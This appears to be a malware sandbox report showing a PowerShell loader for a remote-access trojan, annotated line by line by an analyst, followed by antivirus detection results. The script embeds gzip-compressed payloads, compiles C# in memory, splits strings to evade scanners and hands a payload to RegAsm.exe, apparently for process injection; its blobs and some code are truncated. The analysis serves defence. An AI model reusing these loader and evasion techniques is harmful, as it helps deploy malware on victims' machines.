Static | ZeroBOX
No static analysis available.
#by code 3losh rat
# Analyst note: the sample loads four .NET assemblies into the PowerShell session.
# Microsoft.CSharp supplies the CSharpCodeProvider that CodeDom instantiates further down.
# The other three match assemblies the script later passes to the compiler as references.
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName Microsoft.VisualBasic
Add-Type -AssemblyName Microsoft.CSharp
Add-Type -AssemblyName System.Management
# $ALOSH is an embedded blob written as decimal bytes. It begins with 31,139,8, which is
# the gzip magic (0x1F 0x8B) followed by the deflate method byte. It is later gunzipped
# and compiled as C# source inside CodeDom.
# NOTE(review): the array is cut off in this listing (no closing parenthesis), so the
# first-stage source cannot be recovered from this page alone.
[Byte[]] $ALOSH = @(31,139,8,0,0,0,0,0,4,0,237,189,7,96,28,73,150,37,38,47,109,202,123,127,74,245,74,215,224,116,161,8,128,96,19,36,216,144,64,16,236,193,136,205,230,146,236,29,105,71,35,41,171,42,129,202,101,86,101,93,102,22,64,204,237,157,188,247,222,123,239,189,247,222,123,239,189,247,186,59,157,78,39,247,223,255,63,92,102,100,1,108,246,206,74,218,201,158,33,128,170,200,31,63,126,124,31,63,34,214,77,177,188,72,95,95,55,109,190,56,252,141,19,255,207,241,211,34,187,88,86,77,91,76,155,238,87,175,214,203,182,88,228,227,179,101,155,215,213,234,117,94,95,22,211,220,53,251,162,152,214,85,83,157,183,227,159,44,154,117,86,62,201,154,98,74,223,254,198,201,50,91,228,205,42,155,230,233,170,174,126,250,217,87,79,127,227,228,23,255,198,73,74,207,106,61,41,139,105,218,180,25,245,152,78,203,172,105,210,151,199,242,157,54,233,55,107,218,26,253,189,202,47,243,186,201,95,243,95,91,250,33,253,117,199,189,231,129,192,227,94,164,223,210,207,210,143,62,58,12,27,20,203,54,125,158,47,47,218,121,231,11,249,144,94,33,248,99,253,99,5
# Decompress: gunzips a byte array entirely in memory and returns the inflated bytes.
# Nothing in this function touches disk; both streams are MemoryStream instances.
# NOTE(review): the listing has lost the closing ")" of the Param block and the closing
# braces of Process and of the function itself, so this text is not runnable as shown.
Function Decompress {
[CmdletBinding()]
Param (
[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
[byte[]] $byteArray = $(Throw("-byteArray is required"))
Process {
# $input is a PowerShell automatic variable; the script reuses the name as a plain local.
# The unary comma wraps the byte array so it is passed as one constructor argument.
$input = New-Object System.IO.MemoryStream( , $byteArray )
$output = New-Object System.IO.MemoryStream
$gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
$gzipStream.CopyTo( $output )
$gzipStream.Close()
$input.Close()
[byte[]] $byteOutArray = $output.ToArray()
return $byteOutArray
# CodeDom: compiles an embedded, gzip-compressed C# source blob in memory and invokes one
# static method of the resulting assembly.
#   $BB - gzip-compressed bytes that decode to C# source text
#   $TP - full name of the type to look up in the compiled assembly
#   $MT - name of the method to invoke on that type
# Several literals are split and rejoined with Replace() or "+" so that the plain strings
# do not appear in the script text. Content-based detection has to match the pieces or
# work on the values resolved at run time.
# NOTE(review): on .NET Framework, CSharpCodeProvider normally performs the compile by
# launching csc.exe, so a PowerShell process with a csc.exe child is a useful behavioural
# signal for this technique. Confirm against process telemetry from the sandbox run.
function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {
$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'
# Resolves to "CompilerVersion"; together with "v4.0" it forms the provider option.
$hello = "Com<><><><><><><".Replace("<><><><><><><","pilerVersion")
$v4 = "v4.0"
$dictionary.Add($hello, $v4)
$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)
$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters
# Resolves to "System.dll".
$v1 = "Sys@@@".Replace("@@@","tem.dll")
$CompilerParametres.ReferencedAssemblies.Add($v1)
# Resolves to "System.Management.dll".
$CompilerParametres.ReferencedAssemblies.Add("System.!@!$^^%^%**&*&*$$%$%$".Replace("!@!$^^%^%**&*&*$$%$%$","Management.dll"))
$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")
$CompilerParametres.ReferencedAssemblies.Add("mscorlib.dll")
$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")
# Output is requested as an in-memory library with no debug information.
$CompilerParametres.IncludeDebugInformation = $false
$CompilerParametres.GenerateExecutable = $false
$CompilerParametres.GenerateInMemory = $true
# 32-bit target with unsafe code enabled.
$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"
# The first blob is gunzipped, decoded with the system default encoding, and compiled
# as C# source text.
$BB = Decompress($BB)
[System.CodeDom.Compiler.CompilerResults] $CompilerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [System.Text.Encoding]::Default.GetString($BB))
[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)
# Second embedded gzip blob (same 31,139,8 header), inflated to raw bytes and passed on
# as data rather than compiled.
# NOTE(review): the array is cut off in this listing, so the payload bytes are incomplete here.
[Byte[]] $Bytes = Decompress(@(31,139,8,0,0,0,0,0,4,0,180,189,9,152,100,69,145,56,30,245,170,186,170,186,123,174,158,233,233,238,185,187,167,167,135,102,6,230,158,161,135,115,234,190,239,187,68,160,238,187,94,213,123,85,213,85,133,12,131,162,130,8,136,172,8,120,1,226,174,186,174,138,215,202,138,10,130,162,203,33,224,177,138,140,162,238,226,185,162,187,120,174,43,255,136,124,175,170,171,103,70,100,127,223,247,239,166,227,101,68,102,70,70,70,70,68,102,189,26,92,241,183,129,18,0,84,248,247,242,203,0,159,5,233,231,24,252,237,159,19,248,183,106,219,191,172,130,79,13,63,49,243,89,133,243,137,153,96,190,32,78,215,4,62,39,36,42,211,169,68,181,202,55,166,147,153,105,161,89,157,46,84,167,141,158,192,116,133,79,103,246,172,92,57,178,67,230,225,53,1,56,21,74,152,125,219,63,95,214,227,251,60,112,138,81,133,22,224,19,136,140,72,180,143,62,133,96,154,85,74,210,81,153,147,228,6,88,122,194,180,130,209,129,85,31,123,35,192,26,246,223,210,179,255,96,63,65,228,27,145,6,133,151,53,103,154,165,2,86,188,10,93,156,246,131,242,105
# Resolves to "RegAsm.exe", joined to the current .NET runtime directory.
$nan = "R"+"e"+"g"+"A"+"s"+"m"+"."+"e"+"x"+"e"
[String] $MyPt = [System.IO.Path]::Combine([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory(),$nan)
# "Framework64" is rewritten to "Framework", which points the path at the 32-bit
# framework directory and matches the /platform:X86 option above.
[Object[]] $Params=@($MyPt.Replace("F"+"r"+"a"+"m"+"e"+"w"+"or"+"k"+"6"+"4","F"+"r"+"a"+"mew"+"o"+"r"+"k") ,$Bytes)
# Invoke($null, ...) calls the method as a static, with two arguments: the RegAsm.exe
# path and the inflated byte payload.
# NOTE(review): handing a signed framework binary's path plus a raw payload to an
# "Execute" method is consistent with running the payload under that binary's process,
# but the compiled source is not visible here. Confirm from the sandbox behaviour log.
return $T.GetMethod($MT).Invoke($null, $Params)
# The matching "try {" is missing from this listing. The empty catch suppresses any
# compile or invoke error, so failures leave no error output.
} catch { }
# Entry point of the script: pause one second, then run the loader.
[System.Threading.Thread]::Sleep(1000)
# Resolves to the type name "projFUD.PA" and the method name "Execute". Both are built by
# concatenation so the plain strings never appear in the script text. Useful hunting
# strings once de-obfuscated, e.g. in script block logs.
$xx = "p"+"r"+"o"+"j"+"F"+"U"+"D"+"."+"P"+"A"
$tata = "E"+"x"+"e"+"c"+"u"+"t"+"e"
# Compiles the first embedded blob and invokes projFUD.PA's Execute method via CodeDom.
CodeDom $ALOSH ($xx) ($tata)
#by code 3losh rat
Antivirus Signature
Bkav Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDropper.Agent.NO
Baidu Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan.PowerShell.Invoker.gen
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb PowerShell.Packed.50
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition PS/Agent.eo
CMC Clean
Emsisoft Clean
Ikarus Trojan-Dropper.PowerShell.Agent
GData Clean
Jiangmin Clean
Avira VBS/Agent.PRG
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Malicious (score: 99)
AhnLab-V3 Clean
McAfee PS/Agent.eo
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet PowerShell/Agent.NO!tr
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.